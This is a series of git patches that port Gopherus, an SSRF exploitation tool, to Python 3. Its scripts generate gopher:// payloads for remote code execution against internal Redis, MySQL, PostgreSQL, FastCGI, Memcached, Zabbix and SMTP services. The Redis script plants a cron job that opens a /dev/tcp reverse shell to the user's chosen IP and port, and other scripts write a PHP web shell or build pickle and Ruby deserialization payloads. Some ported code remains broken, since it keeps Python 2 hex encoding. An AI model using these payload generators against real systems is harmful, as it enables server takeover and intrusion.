From 4546f5f106b1a6ef1d001be8dc3b28e6b82d9a11 Mon Sep 17 00:00:00 2001 From: Antabuse-does-something Date: Sun, 23 Jan 2022 12:11:47 -0500 Subject: [PATCH 1/3] Updated python code --- .gitignore | 1 + README.md | 5 +++ gopherus.py | 63 ----------------------------- gopherus3.py | 68 +++++++++++++++++++++++++++++++ install.sh | 8 ++-- requirements.txt | 2 + scripts/DumpMemcached.py | 12 +++--- scripts/FastCGI.py | 19 ++++----- scripts/MySQL.py | 45 ++++++++++----------- scripts/PHPMemcached.py | 20 ++++----- scripts/PostgreSQL.py | 20 ++++----- scripts/PyMemcached.py | 30 +++++++------- scripts/RbMemcached.py | 29 +++++++------- scripts/Redis.py | 87 ++++++++++++++++++++-------------------- scripts/SMTP.py | 20 ++++----- scripts/Zabbix.py | 14 +++---- scripts/__init__.py | 1 - 17 files changed, 230 insertions(+), 214 deletions(-) delete mode 100755 gopherus.py create mode 100755 gopherus3.py create mode 100644 requirements.txt delete mode 100644 scripts/__init__.py diff --git a/.gitignore b/.gitignore index 0d20b64..feae5c1 100644 --- a/.gitignore +++ b/.gitignore @@ -1 +1,2 @@ *.pyc +__pycache__ \ No newline at end of file diff --git a/README.md b/README.md index 7410481..387e860 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,11 @@ # Gopherus If you know a place which is SSRF vulnerable then, this tool will help you to generate Gopher payload for exploiting SSRF (Server Side Request Forgery) and gaining RCE (Remote Code Execution). And also it will help you to get the Reverse shell on the victim server. And for more information you can get a blog on the same [Blog on Gopherus](https://spyclub.tech/2018/08/14/2018-08-14-blog-on-gopherus/) + +## Note : + +This repo is a fork from the Original Tool but I have updated the code from python2 to python3 and added a new feature to select the port for the reverse shell(Redis). + ## About This tool can generate payload for following: 1. MySQL (Port-3306) diff --git a/gopherus.py b/gopherus.py deleted file mode 100755 index e7dd713..0000000 --- a/gopherus.py +++ /dev/null @@ -1,63 +0,0 @@ -#!/usr/bin/python2 -import argparse -import sys -sys.path.insert(0,'./scripts/') -from scripts import FastCGI, MySQL, PostgreSQL, DumpMemcached, PHPMemcached, PyMemcached, RbMemcached, Redis, SMTP, Zabbix - -parser = argparse.ArgumentParser() -parser.add_argument("--exploit", - help="mysql,\n" - "postgresql,\n" - "fastcgi,\n" - "redis,\n" - "smtp,\n" - "zabbix,\n" - "pymemcache,\n" - "rbmemcache,\n" - "phpmemcache,\n" - "dmpmemcache") -args = parser.parse_args() - -class colors: - reset='\033[0m' - red='\033[31m' - green='\033[32m' - orange='\033[33m' - blue='\033[34m' - -print colors.green + """ - - ________ .__ - / _____/ ____ ______ | |__ ___________ __ __ ______ -/ \ ___ / _ \\\\____ \| | \_/ __ \_ __ \ | \/ ___/ -\ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \\ - \______ /\____/| __/|___| /\___ >__| |____//____ > - \/ |__| \/ \/ \/ -""" + "\n\t\t" + colors.blue + "author: " + colors.orange + "$_SpyD3r_$" + "\n" + colors.reset - -if(not args.exploit): - print parser.print_help() - exit() - -if(args.exploit=="mysql"): - MySQL.MySQL() -elif(args.exploit=="postgresql"): - PostgreSQL.PostgreSQL() -elif(args.exploit=="fastcgi"): - FastCGI.FastCGI() -elif(args.exploit=="redis"): - Redis.Redis() -elif(args.exploit=="smtp"): - SMTP.SMTP() -elif(args.exploit=="zabbix"): - Zabbix.Zabbix() -elif(args.exploit=="dmpmemcache"): - DumpMemcached.DumpMemcached() -elif(args.exploit=="phpmemcache"): - PHPMemcached.PHPMemcached() -elif(args.exploit=="rbmemcache"): - RbMemcached.RbMemcached() -elif(args.exploit=="pymemcache"): - PyMemcached.PyMemcached() -else: - print parser.print_help() diff --git a/gopherus3.py b/gopherus3.py new file mode 100755 index 0000000..68657a2 --- /dev/null +++ b/gopherus3.py @@ -0,0 +1,68 @@ +#!/usr/bin/python +import argparse +from ast import match_case +import sys +sys.path.insert(0, './scripts/') +from scripts import FastCGI, MySQL, PostgreSQL, DumpMemcached, PHPMemcached, PyMemcached, RbMemcached, Redis, SMTP, Zabbix + + +class colors: + reset='\033[0m' + red='\033[31m' + green='\033[32m' + orange='\033[33m' + blue='\033[34m' + + +def main(): + parser = argparse.ArgumentParser() + parser.add_argument("--exploit", + help="mysql,\n" + "postgresql,\n" + "fastcgi,\n" + "redis,\n" + "smtp,\n" + "zabbix,\n" + "pymemcache,\n" + "rbmemcache,\n" + "phpmemcache,\n" + "dmpmemcache") + args = parser.parse_args() + print(colors.green + """ + ________ .__ ________ + / _____/ ____ ______ | |__ ___________ __ __ ______ \_____ \ + / \ ___ / _ \\\\____ \| | \_/ __ \_ __ \ | \/ ___/ _(__ < + \ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \\ / \\ + \______ /\____/| __/|___| /\___ >__| |____//____ > /______ / + \/ |__| \/ \/ \/ \/ + """+ "\n\t\t" + colors.blue + "author: " + colors.orange + "$_SpyD3r_$" + "\n" + colors.reset) + + if(not args.exploit): + print(parser.print_help()) + sys.exit(1) + + if(args.exploit=="mysql"): + MySQL.MySQL() + elif(args.exploit=="postgresql"): + PostgreSQL.PostgreSQL() + elif(args.exploit=="fastcgi"): + FastCGI.FastCGI() + elif(args.exploit=="redis"): + Redis.Redis() + elif(args.exploit=="smtp"): + SMTP.SMTP() + elif(args.exploit=="zabbix"): + Zabbix.Zabbix() + elif(args.exploit=="dmpmemcache"): + DumpMemcached.DumpMemcached() + elif(args.exploit=="phpmemcache"): + PHPMemcached.PHPMemcached() + elif(args.exploit=="rbmemcache"): + RbMemcached.RbMemcached() + elif(args.exploit=="pymemcache"): + PyMemcached.PyMemcached() + else: + print(parser.print_help()) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/install.sh b/install.sh index b4d9023..151035a 100755 --- a/install.sh +++ b/install.sh @@ -1,5 +1,5 @@ #!/bin/bash -pip2 install argparse -pip2 install requests -chmod +x gopherus.py -ln -sf $(pwd)/gopherus.py /usr/local/bin/gopherus +pip3 install -r requirements.txt +chmod +x gopherus3.py +sudo ln -sf $(pwd)/gopherus3.py /usr/local/bin/gopherus3 +echo "Gopherus3 installed" \ No newline at end of file diff --git a/requirements.txt b/requirements.txt new file mode 100644 index 0000000..05f27b4 --- /dev/null +++ b/requirements.txt @@ -0,0 +1,2 @@ +argparse +requests \ No newline at end of file diff --git a/scripts/DumpMemcached.py b/scripts/DumpMemcached.py index cd7a24f..6d74416 100644 --- a/scripts/DumpMemcached.py +++ b/scripts/DumpMemcached.py @@ -1,12 +1,12 @@ -import urllib +import urllib.parse def DumpMemcached(): - code = raw_input("\033[96m" +"Give payload you want to run in Memcached Server: "+ "\033[0m") + code = input("\033[96m" +"Give payload you want to run in Memcached Server: "+ "\033[0m") - payload = urllib.quote_plus(code).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") + payload = urllib.parse.quote_plus(code).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") finalpayload = "gopher://127.0.0.1:11211/_%0d%0a" + payload + "%0d%0a" - print "\033[93m" +"\nYour gopher link is ready to dump Memcache : \n"+ "\033[0m" - print finalpayload - print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+ "\033[0m" + print("\033[93m" +"\nYour gopher link is ready to dump Memcache : \n"+ "\033[0m") + print(finalpayload) + print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+ "\033[0m") diff --git a/scripts/FastCGI.py b/scripts/FastCGI.py index edf6b12..5708740 100644 --- a/scripts/FastCGI.py +++ b/scripts/FastCGI.py @@ -1,12 +1,12 @@ -import urllib +import urllib.parse def FastCGI(): - filename = raw_input("\033[96m" +"Give one file name which should be surely present in the server (prefer .php file)\nif you don't know press ENTER we have default one: "+ "\033[0m") + filename = input("\033[96m" +"Give one file name which should be surely present in the server (prefer .php file)\nif you don't know press ENTER we have default one: "+ "\033[0m") if(not filename): filename="/usr/share/php/PEAR.php" - command=raw_input("\033[96m" +"Terminal command to run: "+ "\033[0m") + command=input("\033[96m" +"Terminal command to run: "+ "\033[0m") length=len(command)+52 char=chr(length) @@ -25,10 +25,11 @@ def FastCGI(): payload = start + data + end - def get_payload(payload): - finalpayload = urllib.quote_plus(payload).replace("+","%20").replace("%2F","/") - return "gopher://127.0.0.1:9000/_" + finalpayload + print("\033[93m" +"\nYour gopher link is ready to do SSRF: \n" + "\033[0m") + print("\033[04m" + get_payload(payload)+ "\033[0m") + print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m") - print "\033[93m" +"\nYour gopher link is ready to do SSRF: \n" + "\033[0m" - print "\033[04m" + get_payload(payload)+ "\033[0m" - print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m" + +def get_payload(payload): + finalpayload = urllib.parse.quote_plus(payload).replace("+","%20").replace("%2F","/") + return "gopher://127.0.0.1:9000/_" + finalpayload \ No newline at end of file diff --git a/scripts/MySQL.py b/scripts/MySQL.py index 8353f9b..690c8ff 100644 --- a/scripts/MySQL.py +++ b/scripts/MySQL.py @@ -1,7 +1,6 @@ - def MySQL(): - print "\033[31m"+"For making it work username should not be password protected!!!"+ "\033[0m" - user = raw_input("\033[96m" +"\nGive MySQL username: " + "\033[0m") + print("\033[31m"+"For making it work username should not be password protected!!!"+ "\033[0m") + user = input("\033[96m" +"\nGive MySQL username: " + "\033[0m") encode_user = user.encode("hex") user_length = len(user) temp = user_length - 4 @@ -13,26 +12,26 @@ def MySQL(): dump += "69626d7973716c045f7069640532373235350f5f636c69656e745f76657273696f6e06352e372e3232095f706c6174666f726d" dump += "067838365f36340c70726f6772616d5f6e616d65056d7973716c" - query = raw_input("\033[96m" +"Give query to execute: "+ "\033[0m") + query = input("\033[96m" +"Give query to execute: "+ "\033[0m") auth = dump.replace("\n","") - def encode(s): - a = [s[i:i + 2] for i in range(0, len(s), 2)] - return "gopher://127.0.0.1:3306/_%" + "%".join(a) - - - def get_payload(query): - if(query.strip()!=''): - query = query.encode("hex") - query_length = '{:06x}'.format((int((len(query) / 2) + 1))) - query_length = query_length.decode('hex')[::-1].encode('hex') - pay1 = query_length + "0003" + query - final = encode(auth + pay1 + "0100000001") - return final - else: - return encode(auth) - - print "\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m" - print "\033[04m" + get_payload(query)+ "\033[0m" - print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m" + print("\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m") + print("\033[04m" + get_payload(query,auth)+ "\033[0m") + print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m") + + +def encode(s): + a = [s[i:i + 2] for i in range(0, len(s), 2)] + return "gopher://127.0.0.1:3306/_%" + "%".join(a) + +def get_payload(query,auth): + if(query.strip()!=''): + query = query.encode("hex") + query_length = '{:06x}'.format((int((len(query) / 2) + 1))) + query_length = query_length.decode('hex')[::-1].encode('hex') + pay1 = query_length + "0003" + query + final = encode(auth + pay1 + "0100000001") + return final + else: + return encode(auth) \ No newline at end of file diff --git a/scripts/PHPMemcached.py b/scripts/PHPMemcached.py index 6de9da9..34ed59c 100644 --- a/scripts/PHPMemcached.py +++ b/scripts/PHPMemcached.py @@ -1,20 +1,20 @@ -import urllib +import urllib.parse def PHPMemcached(): - print "\033[01m" + "\nThis is usable when you know Class and Variable name used by user\n"+ "\033[0m" + print("\033[01m" + "\nThis is usable when you know Class and Variable name used by user\n"+ "\033[0m") - code = raw_input("\033[96m" +"Give serialization payload\nexample: O:5:\"Hello\":0:{} : "+ "\033[0m") + code = input("\033[96m" +"Give serialization payload\nexample: O:5:\"Hello\":0:{} : "+ "\033[0m") if(not code): - print "\033[93m" + "Plz give payload" + "\033[0m" + print("\033[93m" + "Plz give payload" + "\033[0m") exit() payload = "%0d%0aset SpyD3r 4 0 " + str(len(code)) + "%0d%0a" + code + "%0d%0a" - finalpayload = urllib.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") + finalpayload = urllib.parse.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") - print "\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m" - print "\033[04m" + "gopher://127.0.0.1:11211/_" + finalpayload + "\033[0m" - print "\033[93m" +"\nAfter everything done, you can delete memcached item by using this payload: \n"+ "\033[0m" - print "\033[04m" + "gopher://127.0.0.1:11211/_%0d%0adelete%20SpyD3r%0d%0a"+ "\033[0m" - print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m" + print("\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m") + print("\033[04m" + "gopher://127.0.0.1:11211/_" + finalpayload + "\033[0m") + print("\033[93m" +"\nAfter everything done, you can delete memcached item by using this payload: \n"+ "\033[0m") + print("\033[04m" + "gopher://127.0.0.1:11211/_%0d%0adelete%20SpyD3r%0d%0a"+ "\033[0m") + print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m") diff --git a/scripts/PostgreSQL.py b/scripts/PostgreSQL.py index 16b4d68..f50ac22 100644 --- a/scripts/PostgreSQL.py +++ b/scripts/PostgreSQL.py @@ -1,7 +1,7 @@ def PostgreSQL(): - user = raw_input("\033[96m" + "PostgreSQL Username: " + "\033[0m") - db = raw_input("\033[96m" + "Database Name: " + "\033[0m") - query = raw_input("\033[96m" + "Query: " + "\033[0m") + user = input("\033[96m" + "PostgreSQL Username: " + "\033[0m") + db = input("\033[96m" + "Database Name: " + "\033[0m") + query = input("\033[96m" + "Query: " + "\033[0m") encode_user = user.encode("hex") encode_db = db.encode("hex") @@ -16,11 +16,13 @@ def PostgreSQL(): packet = start + data + end - def encode(s): - a = [s[i:i + 2] for i in range(0, len(s), 2)] - return "gopher://127.0.0.1:5432/_%" + "%".join(a) - print "\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m" - print "\033[04m" + encode(packet) + "\033[0m" - print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m" + + print("\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m") + print("\033[04m" + encode(packet) + "\033[0m") + print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m") + +def encode(s): + a = [s[i:i + 2] for i in range(0, len(s), 2)] + return "gopher://127.0.0.1:5432/_%" + "%".join(a) \ No newline at end of file diff --git a/scripts/PyMemcached.py b/scripts/PyMemcached.py index ae8f5b5..353cdb5 100644 --- a/scripts/PyMemcached.py +++ b/scripts/PyMemcached.py @@ -1,10 +1,10 @@ -import cPickle +import pickle import os -import urllib +import urllib.parse def PyMemcached(): - print "\033[01m" +"\nReady to Get Reverse SHELL\n"+ "\033[0m" - server = raw_input("\033[96m" +"Give server IP you want to connect (default is 127.0.0.1): "+ "\033[0m") + print("\033[01m" +"\nReady to Get Reverse SHELL\n"+ "\033[0m") + server = input("\033[96m" +"Give server IP you want to connect (default is 127.0.0.1): "+ "\033[0m") if(not server): server = "127.0.0.1" @@ -16,18 +16,18 @@ def __reduce__(self): if(cmd): return (os.system,(cmd,)) - command = (cPickle.dumps(PickleRCE())) + command = (pickle.dumps(PickleRCE())) - def get_payload(command): - payload = urllib.quote_plus(command).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") - finalpayload = "%0d%0aset%20SpyD3r%201%2060%20" + str(len(command)) + "%0d%0a" + payload + "%0d%0a" - return finalpayload + print("\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m") + print("\033[04m" + "gopher://127.0.0.1:11211/_" + get_payload(command)+ "\033[0m") - print "\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m" - print "\033[04m" + "gopher://127.0.0.1:11211/_" + get_payload(command)+ "\033[0m" + print("\033[01m" +"\nThen You can connect it with : nc " + server + " 1234"+ "\033[0m") - print "\033[01m" +"\nThen You can connect it with : nc " + server + " 1234"+ "\033[0m" + print("\033[93m" +"\nAfter everything done, you can delete memcached item by using this payload: \n"+ "\033[0m") + print("\033[04m" + "gopher://127.0.0.1:11211/_%0d%0adelete%20SpyD3r%0d%0a"+ "\033[0m") + print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m") - print "\033[93m" +"\nAfter everything done, you can delete memcached item by using this payload: \n"+ "\033[0m" - print "\033[04m" + "gopher://127.0.0.1:11211/_%0d%0adelete%20SpyD3r%0d%0a"+ "\033[0m" - print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m" +def get_payload(command): + payload = urllib.parse.quote_plus(command).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") + finalpayload = "%0d%0aset%20SpyD3r%201%2060%20" + str(len(command)) + "%0d%0a" + payload + "%0d%0a" + return finalpayload \ No newline at end of file diff --git a/scripts/RbMemcached.py b/scripts/RbMemcached.py index 3c1ffac..104d255 100644 --- a/scripts/RbMemcached.py +++ b/scripts/RbMemcached.py @@ -1,8 +1,8 @@ -import urllib +import urllib.parse def RbMemcached(): - print "\033[01m" +"\nReady to Get Reverse SHELL\n"+ "\033[0m" - server = raw_input("\033[96m" +"Give server IP you want to connect (default is 127.0.0.1): "+ "\033[0m") + print("\033[01m" +"\nReady to Get Reverse SHELL\n"+ "\033[0m") + server = input("\033[96m" +"Give server IP you want to connect (default is 127.0.0.1): "+ "\033[0m") if(not server): server = "127.0.0.1" @@ -13,17 +13,18 @@ def RbMemcached(): payload = """\x04\x08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\t:\x0e@instanceo:\x08ERB\x06:\t@srcI\"""" + chr(len(cmd)+10) payload += "%x(" + cmd + """);\x06:\x06ET:\x0c@method:\x0bresult:\t@varI"\x0c@result\x06;\tT:\x10@deprecatoro:\x1fActiveSupport::Deprecation\x06:\x0e@silencedT""" - def get_payload(payload): - payload_len = len(payload) - payload = urllib.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") - finalpayload = "%0d%0aset%20SpyD3r%204%2060%20" + str(payload_len) + "%0d%0a" + payload + "%0d%0a" - return finalpayload - print "\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m" - print "\033[04m" +"gopher://127.0.0.1:11211/_" + get_payload(payload)+ "\033[0m" - print "\033[01m" +"\nThen You can connect it with : nc " + server + " 1234"+ "\033[0m" + print("\033[93m" +"\nYour gopher link is ready to do SSRF : \n" + "\033[0m") + print("\033[04m" +"gopher://127.0.0.1:11211/_" + get_payload(payload)+ "\033[0m") + print("\033[01m" +"\nThen You can connect it with : nc " + server + " 1234"+ "\033[0m") + print("\033[93m" +"\nAfter everything done, you can delete memcached item by using this payload: \n"+ "\033[0m") + print("\033[04m" + "gopher://127.0.0.1:11211/_%0d%0adelete%20SpyD3r%0d%0a"+ "\033[0m") + print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m") - print "\033[93m" +"\nAfter everything done, you can delete memcached item by using this payload: \n"+ "\033[0m" - print "\033[04m" + "gopher://127.0.0.1:11211/_%0d%0adelete%20SpyD3r%0d%0a"+ "\033[0m" - print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m" + +def get_payload(payload): + payload_len = len(payload) + payload = urllib.parse.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") + finalpayload = "%0d%0aset%20SpyD3r%204%2060%20" + str(payload_len) + "%0d%0a" + payload + "%0d%0a" + return finalpayload \ No newline at end of file diff --git a/scripts/Redis.py b/scripts/Redis.py index fbea515..67c5518 100644 --- a/scripts/Redis.py +++ b/scripts/Redis.py @@ -1,16 +1,30 @@ -import urllib +import urllib.parse def Redis(): - def get_Redis_ReverseShell(): - server = raw_input("\033[96m" +"\nGive your IP Address to connect with victim through Revershell (default is 127.0.0.1): "+ "\033[0m") - crontab_dir = raw_input("\033[96m" +"What can be his Crontab Directory location\n## For debugging(locally) you can use /var/lib/redis : "+ "\033[0m") - if(not server): - server = "127.0.0.1" - if(not crontab_dir): - crontab_dir = "/var/spool/cron/" - cmd = '*/1 * * * * bash -c "sh -i >& /dev/tcp/' + server + '/1234 0>&1"' - len_cmd = len(cmd) + 5 - payload = """*1\r + print("\033[01m"+"\nReady To get SHELL\n"+ "\033[0m") + what = input("\033[35m" +"What do you want?? (ReverseShell/PHPShell): "+ "\033[0m") + what = what.lower() + if("rev" in what): + get_Redis_ReverseShell() + elif("php" in what): + get_Redis_PHPShell() + else: + print("\033[93m" +"Plz choose between those two"+ "\033[0m") + exit(1) + +def get_Redis_ReverseShell(): + server = input("\033[96m" +"\nGive your IP Address to connect with victim through Revershell (default is 127.0.0.1): "+ "\033[0m") + port = input("\033[96m" +"\nGive your Port to connect with victim through Revershell (default is 1234): "+ "\033[0m") + crontab_dir = input("\033[96m" +"What can be his Crontab Directory location\n## For debugging(locally) you can use /var/lib/redis : "+ "\033[0m") + if(not server): + server = "127.0.0.1" + if(not crontab_dir): + crontab_dir = "/var/spool/cron/" + if(not port): + port = "1234" + cmd = '*/1 * * * * bash -c "sh -i >& /dev/tcp/' + server + '/'+port+' 0>&1"' + len_cmd = len(cmd) + 5 + payload = """*1\r $8\r flushall\r *3\r @@ -48,23 +62,22 @@ def get_Redis_ReverseShell(): save\r """ - finalpayload = urllib.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") - print "\033[93m" +"\nYour gopher link is ready to get Reverse Shell: \n"+ "\033[0m" - print "\033[04m" +"gopher://127.0.0.1:6379/_" + finalpayload+ "\033[0m" - print "\033[01m" +"\nBefore sending request plz do `nc -lvp 1234`"+ "\033[0m" - print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m" - + finalpayload = urllib.parse.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") + print("\033[93m" +"\nYour gopher link is ready to get Reverse Shell: \n"+ "\033[0m") + print("\033[04m" +"gopher://127.0.0.1:6379/_" + finalpayload+ "\033[0m") + print("\033[01m" +"\nBefore sending request plz do `nc -lvp "+port+ "\033[0m") + print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m") - def get_Redis_PHPShell(): - web_root_location = raw_input("\033[96m" +"\nGive web root location of server (default is /var/www/html): "+ "\033[0m") - php_payload = raw_input("\033[96m" +"Give PHP Payload (We have default PHP Shell): "+ "\033[0m") - default = "" - if(not php_payload): - php_payload = default - if(not web_root_location): - web_root_location = "/var/www/html" - payload = """*1\r +def get_Redis_PHPShell(): + web_root_location = input("\033[96m" +"\nGive web root location of server (default is /var/www/html): "+ "\033[0m") + php_payload = input("\033[96m" +"Give PHP Payload (We have default PHP Shell): "+ "\033[0m") + default = "" + if(not php_payload): + php_payload = default + if(not web_root_location): + web_root_location = "/var/www/html" + payload = """*1\r $8\r flushall\r *3\r @@ -101,20 +114,8 @@ def get_Redis_PHPShell(): save\r """ - finalpayload = urllib.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") - print "\033[93m" +"\nYour gopher link is Ready to get PHP Shell: \n"+ "\033[0m" - print "\033[04m" +"gopher://127.0.0.1:6379/_" + finalpayload+ "\033[0m" - print "\033[01m"+"\nWhen it's done you can get PHP Shell in /shell.php at the server with `cmd` as parmeter. "+ "\033[0m" - print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m" - - - print "\033[01m"+"\nReady To get SHELL\n"+ "\033[0m" - what = raw_input("\033[35m" +"What do you want?? (ReverseShell/PHPShell): "+ "\033[0m") - what = what.lower() - if("rev" in what): - get_Redis_ReverseShell() - elif("php" in what): - get_Redis_PHPShell() - else: - print "\033[93m" +"Plz choose between those two"+ "\033[0m" - exit() + finalpayload = urllib.parse.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") + print("\033[93m" +"\nYour gopher link is Ready to get PHP Shell: \n"+ "\033[0m") + print("\033[04m" +"gopher://127.0.0.1:6379/_" + finalpayload+ "\033[0m") + print("\033[01m"+"\nWhen it's done you can get PHP Shell in /shell.php at the server with `cmd` as parmeter. "+ "\033[0m") + print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m") diff --git a/scripts/SMTP.py b/scripts/SMTP.py index a005fd0..9324127 100644 --- a/scripts/SMTP.py +++ b/scripts/SMTP.py @@ -1,11 +1,11 @@ -import urllib +import urllib.parse def SMTP(): - print "\033[01m"+"\nGive Details to send mail: \n"+ "\033[0m" - mailfrom = raw_input("\033[96m" +"Mail from : "+ "\033[0m") - Mailto = raw_input("\033[96m" +"Mail To : "+ "\033[0m") - subject = raw_input("\033[96m" +"Subject : "+ "\033[0m") - msg = raw_input("\033[96m" +"Message : "+ "\033[0m") + print("\033[01m"+"\nGive Details to send mail: \n"+ "\033[0m") + mailfrom = input("\033[96m" +"Mail from : "+ "\033[0m") + Mailto = input("\033[96m" +"Mail To : "+ "\033[0m") + subject = input("\033[96m" +"Subject : "+ "\033[0m") + msg = input("\033[96m" +"Message : "+ "\033[0m") commands = [ 'MAIL FROM:' + mailfrom, @@ -18,8 +18,8 @@ def SMTP(): ] payload = "%0A".join(commands) - finalpayload = urllib.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") + finalpayload = urllib.parse.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") - print "\033[93m" +"\nYour gopher link is ready to send Mail: \n"+ "\033[0m" - print "\033[04m" +"gopher://127.0.0.1:25/_" + finalpayload+ "\033[0m" - print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m" + print("\033[93m" +"\nYour gopher link is ready to send Mail: \n"+ "\033[0m") + print("\033[04m" +"gopher://127.0.0.1:25/_" + finalpayload+ "\033[0m") + print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m") diff --git a/scripts/Zabbix.py b/scripts/Zabbix.py index 216faed..3edf32f 100644 --- a/scripts/Zabbix.py +++ b/scripts/Zabbix.py @@ -1,15 +1,15 @@ -import urllib +import urllib.parse def Zabbix(): - print "\033[01m"+"\nExecute SHELL command: \n" + "\033[0m" - command = raw_input("\033[96m" +"\nEnter Shell Command to Execute: "+ "\033[0m") + print("\033[01m"+"\nExecute SHELL command: \n" + "\033[0m") + command = input("\033[96m" +"\nEnter Shell Command to Execute: "+ "\033[0m") if(not command): command = "ls" payload = "system.run[(" + command + ");sleep 2s]" - finalpayload = urllib.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") + finalpayload = urllib.parse.quote_plus(payload).replace("+","%20").replace("%2F","/").replace("%25","%").replace("%3A",":") - print "\033[93m" +"\nYour gopher link is ready to do SSRF: \n"+ "\033[0m" - print "\033[04m" +"gopher://127.0.0.1:10050/_" + finalpayload+ "\033[0m" - print "\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m" + print("\033[93m" +"\nYour gopher link is ready to do SSRF: \n"+ "\033[0m") + print("\033[04m" +"gopher://127.0.0.1:10050/_" + finalpayload+ "\033[0m") + print("\n" + "\033[41m" +"-----------Made-by-SpyD3r-----------"+"\033[0m") diff --git a/scripts/__init__.py b/scripts/__init__.py deleted file mode 100644 index 8b13789..0000000 --- a/scripts/__init__.py +++ /dev/null @@ -1 +0,0 @@ - From 0bc7c7300da37094709df85dee1814c63883e240 Mon Sep 17 00:00:00 2001 From: Antabuse-does-something Date: Sun, 23 Jan 2022 12:30:01 -0500 Subject: [PATCH 2/3] bug fix wrong import --- README.md | 2 +- gopherus3.py | 1 - 2 files changed, 1 insertion(+), 2 deletions(-) diff --git a/README.md b/README.md index 387e860..afd4c62 100644 --- a/README.md +++ b/README.md @@ -4,7 +4,7 @@ information you can get a blog on the same [Blog on Gopherus](https://spyclub.te ## Note : -This repo is a fork from the Original Tool but I have updated the code from python2 to python3 and added a new feature to select the port for the reverse shell(Redis). +This repo is a fork from the Original Tool but I have updated the code from python2 to python3 (because python2 is dead) and added a new feature to select the port for the reverse shell(Redis). ## About This tool can generate payload for following: diff --git a/gopherus3.py b/gopherus3.py index 68657a2..8cad4fa 100755 --- a/gopherus3.py +++ b/gopherus3.py @@ -1,6 +1,5 @@ #!/usr/bin/python import argparse -from ast import match_case import sys sys.path.insert(0, './scripts/') from scripts import FastCGI, MySQL, PostgreSQL, DumpMemcached, PHPMemcached, PyMemcached, RbMemcached, Redis, SMTP, Zabbix From 20a589ac240784edf05f48ac81acde0dbc7f3a24 Mon Sep 17 00:00:00 2001 From: Antabuse-does-something Date: Sun, 23 Jan 2022 12:35:10 -0500 Subject: [PATCH 3/3] Change Shebang --- gopherus3.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/gopherus3.py b/gopherus3.py index 8cad4fa..6dc9b28 100755 --- a/gopherus3.py +++ b/gopherus3.py @@ -1,4 +1,4 @@ -#!/usr/bin/python +#!/usr/bin/env python3 import argparse import sys sys.path.insert(0, './scripts/')